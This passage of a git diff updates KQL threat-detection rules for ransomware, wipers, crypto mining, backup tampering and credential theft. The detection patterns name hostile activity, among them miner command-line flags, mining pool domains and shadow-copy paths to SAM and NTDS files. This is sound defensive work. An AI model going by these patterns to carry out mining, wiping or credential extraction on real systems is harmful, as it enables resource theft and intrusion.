Title: Linux Crypto Mining Pool Connections +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects process connections to a Monero crypto mining pool +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Legitimate use of crypto miners + +DeviceNetworkEvents | where RemoteUrl in~ ("pool.minexmr.com", "fr.minexmr.com", "de.minexmr.com", "sg.minexmr.com", "ca.minexmr.com", "us-west.minexmr.com", "pool.supportxmr.com", "mine.c3pool.com", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-asia1.nanopool.org", "xmr-jp1.nanopool.org", "xmr-au1.nanopool.org", "xmr.2miners.com", "xmr.hashcity.org", "xmr.f2pool.com", "xmrpool.eu", "pool.hashvault.pro", "moneroocean.stream", "monerocean.stream") \ No newline at end of file diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql index ffd88b56..55ec5c4e 100644 --- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql +++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql @@ -1,14 +1,14 @@ -// Title: Load Of RstrtMgr.DLL By A Suspicious Process -// Author: Luc Génaux -// Date: 2023-11-28 -// Level: high -// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. -// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -// It could also be used for anti-analysis purposes by shut downing specific processes. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 -// False Positives: -// - Processes related to software installation - -DeviceImageLoadEvents +// Title: Load Of RstrtMgr.DLL By A Suspicious Process +// Author: Luc Génaux +// Date: 2023-11-28 +// Level: high +// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. +// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +// It could also be used for anti-analysis purposes by shut downing specific processes. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 +// False Positives: +// - Processes related to software installation + +DeviceImageLoadEvents | where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql index 6eb12974..1982b74c 100644 --- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql +++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql @@ -1,15 +1,15 @@ -// Title: Load Of RstrtMgr.DLL By An Uncommon Process -// Author: Luc Génaux -// Date: 2023-11-28 -// Level: low -// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. -// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -// It could also be used for anti-analysis purposes by shut downing specific processes. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 -// False Positives: -// - Other legitimate Windows processes not currently listed -// - Processes related to software installation - -DeviceImageLoadEvents +// Title: Load Of RstrtMgr.DLL By An Uncommon Process +// Author: Luc Génaux +// Date: 2023-11-28 +// Level: low +// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. +// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +// It could also be used for anti-analysis purposes by shut downing specific processes. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 +// False Positives: +// - Other legitimate Windows processes not currently listed +// - Processes related to software installation + +DeviceImageLoadEvents | where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp")))) \ No newline at end of file diff --git a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql index b0645f1b..eaba9eb0 100644 --- a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql +++ b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql @@ -1,12 +1,12 @@ -// Title: Network Communication With Crypto Mining Pool -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-10-26 -// Level: high -// Description: Detects initiated network connections to crypto mining pools -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1496 -// False Positives: -// - Unlikely - -DeviceNetworkEvents +// Title: Network Communication With Crypto Mining Pool +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects initiated network connections to crypto mining pools +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Unlikely + +DeviceNetworkEvents | where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru") \ No newline at end of file diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql index 1cf67326..44599194 100644 --- a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql +++ b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql @@ -1,13 +1,13 @@ -// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS -// Author: Pratinav Chandra -// Date: 2024-05-29 -// Level: medium -// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. -// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Legitimate administrator activity - -DeviceProcessEvents +// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-29 +// Level: medium +// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. +// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents | where ProcessCommandLine contains "addexclusion" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil") \ No newline at end of file diff --git a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql index 2a0ddd39..44a79c6c 100644 --- a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql +++ b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql @@ -1,10 +1,10 @@ -// Title: New Root or CA or AuthRoot Certificate to Store -// Author: frack113 -// Date: 2022-04-04 -// Level: medium -// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 - -DeviceRegistryEvents +// Title: New Root or CA or AuthRoot Certificate to Store +// Author: frack113 +// Date: 2022-04-04 +// Level: medium +// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceRegistryEvents | where RegistryValueData =~ "Binary Data" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates*") and RegistryKey endswith "\\Blob" \ No newline at end of file diff --git a/KQL/rules/Impact/portable_gpg_exe_execution.kql b/KQL/rules/Impact/portable_gpg_exe_execution.kql index 391e214a..70660e99 100644 --- a/KQL/rules/Impact/portable_gpg_exe_execution.kql +++ b/KQL/rules/Impact/portable_gpg_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Portable Gpg.EXE Execution -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-06 -// Level: medium -// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1486 - -DeviceProcessEvents +// Title: Portable Gpg.EXE Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-06 +// Level: medium +// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 + +DeviceProcessEvents | where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\"))) \ No newline at end of file diff --git a/KQL/rules/Impact/potential_crypto_mining_activity.kql b/KQL/rules/Impact/potential_crypto_mining_activity.kql index d6cfa7fc..96f5fa0f 100644 --- a/KQL/rules/Impact/potential_crypto_mining_activity.kql +++ b/KQL/rules/Impact/potential_crypto_mining_activity.kql @@ -1,13 +1,13 @@ -// Title: Potential Crypto Mining Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2021-10-26 -// Level: high -// Description: Detects command line parameters or strings often used by crypto miners -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1496 -// False Positives: -// - Legitimate use of crypto miners -// - Some build frameworks - -DeviceProcessEvents +// Title: Potential Crypto Mining Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects command line parameters or strings often used by crypto miners +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Legitimate use of crypto miners +// - Some build frameworks + +DeviceProcessEvents | where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -"))) \ No newline at end of file diff --git a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql index 14ac4dfa..c52573fc 100644 --- a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql +++ b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql @@ -1,10 +1,10 @@ -// Title: Potential File Overwrite Via Sysinternals SDelete -// Author: frack113 -// Date: 2021-06-03 -// Level: high -// Description: Detects the use of SDelete to erase a file not the free space -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1485 - -DeviceProcessEvents +// Title: Potential File Overwrite Via Sysinternals SDelete +// Author: frack113 +// Date: 2021-06-03 +// Level: high +// Description: Detects the use of SDelete to erase a file not the free space +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?"))) \ No newline at end of file diff --git a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql index 1a5b5174..21eea4ca 100644 --- a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql +++ b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql @@ -1,10 +1,10 @@ -// Title: Potential Ransomware Activity Using LegalNotice Message -// Author: frack113 -// Date: 2022-12-11 -// Level: high -// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1491.001 - -DeviceRegistryEvents +// Title: Potential Ransomware Activity Using LegalNotice Message +// Author: frack113 +// Date: 2022-12-11 +// Level: high +// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1491.001 + +DeviceRegistryEvents | where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText") \ No newline at end of file diff --git a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql index aa380599..1083ee9d 100644 --- a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql +++ b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql @@ -1,13 +1,13 @@ -// Title: Potential Secure Deletion with SDelete -// Author: Thomas Patzke -// Date: 2017-06-14 -// Level: medium -// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195 -// False Positives: -// - Legitimate usage of SDelete -// - Files that are interacted with that have these extensions legitimately - -DeviceRegistryEvents +// Title: Potential Secure Deletion with SDelete +// Author: Thomas Patzke +// Date: 2017-06-14 +// Level: medium +// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195 +// False Positives: +// - Legitimate usage of SDelete +// - Files that are interacted with that have these extensions legitimately + +DeviceRegistryEvents | where RegistryKey endswith ".AAA" or RegistryKey endswith ".ZZZ" \ No newline at end of file diff --git a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql index 2adfd108..8a42af26 100644 --- a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql +++ b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql @@ -1,12 +1,12 @@ -// Title: Potential Suspicious Change To Sensitive/Critical Files -// Author: @d4ns4n_ (Wuerth-Phoenix) -// Date: 2023-05-30 -// Level: medium -// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1565.001 -// False Positives: -// - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed. - -DeviceProcessEvents +// Title: Potential Suspicious Change To Sensitive/Critical Files +// Author: @d4ns4n_ (Wuerth-Phoenix) +// Date: 2023-05-30 +// Level: medium +// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1565.001 +// False Positives: +// - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed. + +DeviceProcessEvents | where ((ProcessCommandLine contains ">" and (FolderPath endswith "/cat" or FolderPath endswith "/echo" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/tail")) or (FolderPath endswith "/emacs" or FolderPath endswith "/nano" or FolderPath endswith "/sed" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) and (ProcessCommandLine contains "/bin/login" or ProcessCommandLine contains "/bin/passwd" or ProcessCommandLine contains "/boot/" or (ProcessCommandLine contains "/etc/" and ProcessCommandLine contains ".conf") or ProcessCommandLine contains "/etc/cron." or ProcessCommandLine contains "/etc/crontab" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/init.d" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/opt/bin/" or ProcessCommandLine contains "/sbin" or ProcessCommandLine contains "/usr/bin/" or ProcessCommandLine contains "/usr/local/bin/") \ No newline at end of file diff --git a/KQL/rules/Impact/registry_disable_system_restore.kql b/KQL/rules/Impact/registry_disable_system_restore.kql index 1dfead8f..52c1a66f 100644 --- a/KQL/rules/Impact/registry_disable_system_restore.kql +++ b/KQL/rules/Impact/registry_disable_system_restore.kql @@ -1,10 +1,10 @@ -// Title: Registry Disable System Restore -// Author: frack113 -// Date: 2022-04-04 -// Level: high -// Description: Detects the modification of the registry to disable a system restore on the computer -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 - -DeviceRegistryEvents +// Title: Registry Disable System Restore +// Author: frack113 +// Date: 2022-04-04 +// Level: high +// Description: Detects the modification of the registry to disable a system restore on the computer +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR") \ No newline at end of file diff --git a/KQL/rules/Impact/renamed_gpg_exe_execution.kql b/KQL/rules/Impact/renamed_gpg_exe_execution.kql index eb49ba18..86a7d55a 100644 --- a/KQL/rules/Impact/renamed_gpg_exe_execution.kql +++ b/KQL/rules/Impact/renamed_gpg_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Gpg.EXE Execution -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2023-08-09 -// Level: high -// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1486 - -DeviceProcessEvents +// Title: Renamed Gpg.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-08-09 +// Level: high +// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe"))) \ No newline at end of file diff --git a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql index 8ca5bce7..60d1182a 100644 --- a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql +++ b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql @@ -1,12 +1,12 @@ -// Title: Renamed Sysinternals Sdelete Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-06 -// Level: high -// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1485 -// False Positives: -// - System administrator usage - -DeviceProcessEvents +// Title: Renamed Sysinternals Sdelete Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-06 +// Level: high +// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 +// False Positives: +// - System administrator usage + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql index 44266cf4..fdfbdb41 100644 --- a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql +++ b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql @@ -1,12 +1,12 @@ -// Title: Sensitive File Access Via Volume Shadow Copy Backup -// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) -// Date: 2021-08-09 -// Level: high -// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit) -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Sensitive File Access Via Volume Shadow Copy Backup +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit) +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY") \ No newline at end of file diff 